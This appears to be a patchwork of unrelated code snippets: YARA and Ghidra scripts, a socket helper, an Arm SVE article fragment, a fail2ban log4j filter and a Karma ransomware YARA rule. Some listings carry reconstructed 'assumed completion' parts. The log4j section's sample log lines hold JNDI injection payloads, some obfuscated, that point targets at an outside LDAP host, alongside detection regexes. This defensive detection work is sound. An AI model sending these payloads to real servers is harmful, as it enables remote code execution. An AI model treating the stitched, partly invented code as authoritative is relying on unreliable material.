How to use:
./wordle.sh
Or try the unlimit mode:
# Simple script to demo use of yara-python + externals
# think of all the externals you could define!
import os
import sys
import yara

example_rule = '''
rule demo_externals
{
    // assumed completion: the original listing ends at the opening brace
    condition:
        filename contains ".exe" and filesize_kb < 1024
}
'''
# externals are declared with a typed placeholder at compile time and given real values per match
rules = yara.compile(source=example_rule, externals={'filename': '', 'filesize_kb': 0})
target = sys.argv[1] if len(sys.argv) > 1 else __file__
print(rules.match(target, externals={'filename': os.path.basename(target), 'filesize_kb': os.path.getsize(target) // 1024}))
//Locate RPC procedures inside of server code
//@author Matt Hand (@matterpreter) based on original work by Sektor7 Labs (@reenz0h)
//@category Functions
//@keybinding
//@menupath
//@toolbar
import ghidra.app.script.GhidraScript;
import ghidra.program.model.block.*;
import ghidra.program.model.symbol.*;
/*
This was the first version - the newer version also includes *when* it was loaded.
https://gist.github.com/olliencc/e166a64ca211c51eb69111f26ce57bc1
*/
# Attempts to demangle all mangled symbols in the current program using the Rust
# mangling schemes, and replace the default symbol and function signature
# (if applicable) with the demangled symbol.
#
# License: MIT OR Apache-2.0
#@author Jack Grigg <[email protected]>
#@category Symbol
import string
from os import urandom
from socket import create_connection
from cryptography.hazmat.primitives.asymmetric import padding
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.primitives.serialization import load_der_public_key

def read(sock, length):
    # Read exactly `length` bytes: a single recv() may return fewer.
    # (loop body is a completion of the cut-off listing)
    result = b''
    while len(result) < length:
        chunk = sock.recv(length - len(result))
        if not chunk:
            raise EOFError('connection closed after %d of %d bytes' % (len(result), length))
        result += chunk
    return result
The Scalable Vector Extension (SVE) is Arm's latest SIMD extension to its instruction set, announced in 2016. A follow-up, SVE2, was announced in 2019 and is designed to incorporate all the functionality of Arm's current primary SIMD extension, NEON (also called ASIMD).
Despite being announced 5 years ago, there is currently no generally available CPU that supports any form of SVE (this excludes the [Fugaku supercomputer](https://www.fujitsu.com/global/about/innovation/
# log4j jndi exploit CVE-2021-44228 filter
# Save this file as /etc/fail2ban/filter.d/log4j-jndi.conf
# then copy and uncomment the [log4j-jndi] section
# to /etc/fail2ban/jail.local
#
# [email protected]
# https://jay.gooby.org/2021/12/13/a-fail2ban-filter-for-the-log4j-cve-2021-44228
# https://gist.github.com/jaygooby/3502143639e09bb694e9c0f3c6203949
# Thanks to https://gist.github.com/kocour for a better regex
#
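The filter header above is all that survives of the gist; its failregex is not on this page. As an added example (my own code, not the gist author's filter) the block below shows the detection logic such a filter needs: a pattern that catches the literal `${jndi:` lookup and the nested-lookup obfuscations seen in the wild (`${${lower:j}ndi:`, `${${::-j}${::-n}...`), plus the URL-decoding that access-log lines require. The regex, the helper names and the sample log lines are all assumptions constructed for this page.

```python
import re
from urllib.parse import unquote

# Added example, not the gist's own filter: a failregex-style pattern for the
# log4j JNDI lookup string. It matches the plain "${jndi:" form and the common
# obfuscations that build the word from nested lookups, e.g. "${${lower:j}ndi:"
# or "${${::-j}${::-n}${::-d}${::-i}:". The pattern is an assumption written for
# this page: each letter may be a literal (any case) or a nested "${...}".
_LETTER = r"(?:\$\{[^}]*\}|%s)"
JNDI_RE = re.compile(
    r"\$\{"
    + _LETTER % "[jJ]"
    + _LETTER % "[nN]"
    + _LETTER % "[dD]"
    + _LETTER % "[iI]"
    + r"\s*:"
)

# fail2ban's <HOST> slot: the client address at the start of a combined-format access log line
HOST_RE = re.compile(r"^(?P<host>\S+)\s")


def is_jndi_probe(line: str) -> bool:
    """True if the line carries a JNDI lookup, after undoing up to two layers of URL encoding."""
    decoded = unquote(unquote(line))
    return JNDI_RE.search(decoded) is not None


def scan(log_text: str) -> list:
    """Return (host, line) for every line fail2ban would count as a hit."""
    hits = []
    for line in log_text.splitlines():
        if is_jndi_probe(line):
            m = HOST_RE.match(line)
            hits.append((m.group("host") if m else "?", line))
    return hits


# Constructed sample access-log lines (documentation-range addresses, not real traffic)
SAMPLE_LOG = """\
192.0.2.10 - - [13/Dec/2021:10:00:01 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://198.51.100.5:1389/a}"
192.0.2.11 - - [13/Dec/2021:10:00:02 +0000] "GET /?x=${${lower:j}ndi:ldap://198.51.100.5/a} HTTP/1.1" 400 0 "-" "curl/7.68.0"
192.0.2.12 - - [13/Dec/2021:10:00:03 +0000] "GET /?q=%24%7Bjndi%3Armi%3A%2F%2F198.51.100.5%2Fx%7D HTTP/1.1" 200 12 "-" "Mozilla/5.0"
192.0.2.13 - - [13/Dec/2021:10:00:04 +0000] "GET /about HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
192.0.2.14 - - [13/Dec/2021:10:00:05 +0000] "GET /?s=${${::-j}${::-n}${::-d}${::-i}:ldap://198.51.100.5/o} HTTP/1.1" 200 5 "-" "-"
"""

if __name__ == "__main__":
    for host, line in scan(SAMPLE_LOG):
        print(host, "->", line[:60])
```

Two things differ in a real fail2ban filter: failregex is a Python regex but fail2ban performs no URL decoding, so the `%24%7B` encoded spellings have to be written out as alternatives in the pattern, and the leading `^(?P<host>\S+)` group is replaced by fail2ban's `<HOST>` tag so the ban action knows which address to block.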
This list is no longer updated, so the information in it is no longer reliable.
The latest version (from October 2022) is available here
rule malware_karama_0 {
    meta:
        description = "Karma Ransomware"
    strings:
        $name = "KARMA" ascii wide nocase
        $trait_0 = {33 f6 0f b7 41 ?? 83 c1 02 8b d0 66 85 c0 75 da}
        $trait_1 = {0f b7 d0 66 83 fa 5c 74 10}
    condition:
        uint16(0) == 0x5a4d and
        uint32(uint32(0x3c)) == 0x00004550 and
        // the listing is cut off after the "and" above; the remainder is an assumed completion
        $name and all of ($trait_*)
}
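To make the rule's condition concrete, here is an added example (my own code, not the rule author's tooling) that re-implements what the rule tests in plain Python: the two header reads that gate on a PE file, the `ascii wide nocase` string, and the `??` wildcard in the hex traits. `hex_pattern_to_regex`, `looks_like_pe`, `evaluate` and the constructed sample buffer are assumptions for this page; because the rule's condition is cut off after its last `and`, `evaluate` reports each clause separately instead of guessing how they are joined.

```python
import re
import struct

# Added example, not part of the rule or its author's tooling: a plain-Python
# re-implementation of what the rule's condition and strings test, so the
# header check and the "??" wildcard can be seen in isolation (no yara needed).


def hex_pattern_to_regex(pattern: str) -> "re.Pattern":
    """Convert a YARA hex string such as "{0f b7 41 ?? 83}" into a bytes regex.
    Only the full-byte wildcard "??" is handled, which is all this rule uses."""
    parts = []
    for tok in pattern.strip().strip("{}").split():
        parts.append(b"." if tok == "??" else re.escape(bytes([int(tok, 16)])))
    return re.compile(b"".join(parts), re.DOTALL)


def looks_like_pe(data: bytes) -> bool:
    """uint16(0) == 0x5a4d and uint32(uint32(0x3c)) == 0x00004550, done by hand.
    YARA's uintN() reads little-endian, so 0x5a4d is b"MZ" and 0x4550 is "PE" + two NULs."""
    if len(data) < 0x40 or struct.unpack_from("<H", data, 0)[0] != 0x5A4D:
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]   # offset of the PE signature
    if e_lfanew + 4 > len(data):                          # truncated file or bogus pointer
        return False
    return struct.unpack_from("<I", data, e_lfanew)[0] == 0x00004550


# $name = "KARMA" ascii wide nocase: the ASCII form and the UTF-16LE ("wide") form
NAME_PATTERNS = [
    re.compile(rb"KARMA", re.IGNORECASE),
    re.compile(re.escape("KARMA".encode("utf-16-le")), re.IGNORECASE),
]
TRAITS = [
    hex_pattern_to_regex("{33 f6 0f b7 41 ?? 83 c1 02 8b d0 66 85 c0 75 da}"),
    hex_pattern_to_regex("{0f b7 d0 66 83 fa 5c 74 10}"),
]


def evaluate(data: bytes) -> dict:
    """Report each clause separately; how the rule joins them after its final 'and' is cut off."""
    return {
        "pe": looks_like_pe(data),
        "name": any(p.search(data) for p in NAME_PATTERNS),
        "trait_0": TRAITS[0].search(data) is not None,
        "trait_1": TRAITS[1].search(data) is not None,
    }


def build_sample() -> bytes:
    """Constructed buffer (not a real binary): MZ header, e_lfanew pointing at the PE
    signature, then the rule's strings embedded in filler. The "??" slot holds 0x7f."""
    hdr = bytearray(0x80)
    hdr[0:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x80)
    body = b"PE\x00\x00" + b"\x90" * 16
    body += "karma".encode("utf-16-le")                                   # wide + nocase
    body += bytes.fromhex("33f60fb741" "7f" "83c1028bd06685c075da")        # $trait_0
    body += b"\xcc" * 8
    body += bytes.fromhex("0fb7d06683fa5c7410")                            # $trait_1
    return bytes(hdr) + body


if __name__ == "__main__":
    print(evaluate(build_sample()))
```

The `e_lfanew + 4 > len(data)` guard is the one thing YARA does implicitly: an out-of-range `uint32()` read evaluates to undefined and the clause fails, so a hand-rolled check has to bound the pointer explicitly before following it.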